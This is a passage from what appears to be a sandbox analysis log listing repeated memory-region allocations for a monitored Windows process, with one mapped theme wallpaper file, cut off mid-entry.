Region: id = 2735 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2736 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2737 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2738 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2739 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2740 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2741 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2742 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2743 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2744 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2745 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2746 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2747 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2748 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2749 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2750 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2751 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2752 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2753 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2754 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2755 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2756 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2757 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2758 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2759 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2760 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2761 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2762 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2763 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2764 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2765 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2766 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2767 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2768 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2769 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2770 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2771 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2772 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2773 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2774 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2775 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2776 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2777 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2778 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2779 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2780 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2781 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2782 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2783 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2784 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2785 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2786 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2787 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2788 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2789 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2790 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2791 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2792 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2793 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2794 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2795 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2796 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2797 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2798 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2799 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2800 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2801 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2802 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2803 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2804 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2805 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2806 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2807 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2808 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2809 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2810 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2811 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2812 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2813 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2814 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2815 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2816 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2817 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2818 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2819 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2836 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2837 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2838 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2839 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2840 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2841 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2842 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2843 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2844 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2845 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2846 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2847 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2848 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2849 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2850 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2851 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2852 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2853 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2854 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2855 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2856 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2857 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2858 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2859 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2860 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2861 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2862 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2863 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2864 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2865 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2866 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2867 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2868 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2869 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2870 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2871 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2872 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2873 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2874 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2875 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2876 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2877 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2878 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2879 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2880 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2881 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2882 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2883 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2884 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2885 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2886 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2887 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2888 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2889 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2890 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2891 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2892 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2893 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2894 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2895 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2896 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2897 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2898 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2899 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2900 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2901 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2902 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2903 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2904 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2905 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2906 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2907 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2908 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2909 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2910 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2911 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2912 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2913 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2914 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2915 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2916 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2917 start_va = 0x3cf0000 end_va = 0x3d27fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 2918 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 2919 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2920 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2921 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2922 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2923 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2924 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2925 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2926 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2927 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2928 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2929 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2930 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2931 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2932 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2933 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2934 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2935 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2936 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2937 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2938 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2939 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2940 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2941 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2942 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2943 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2944 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2945 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2946 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2947 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2948 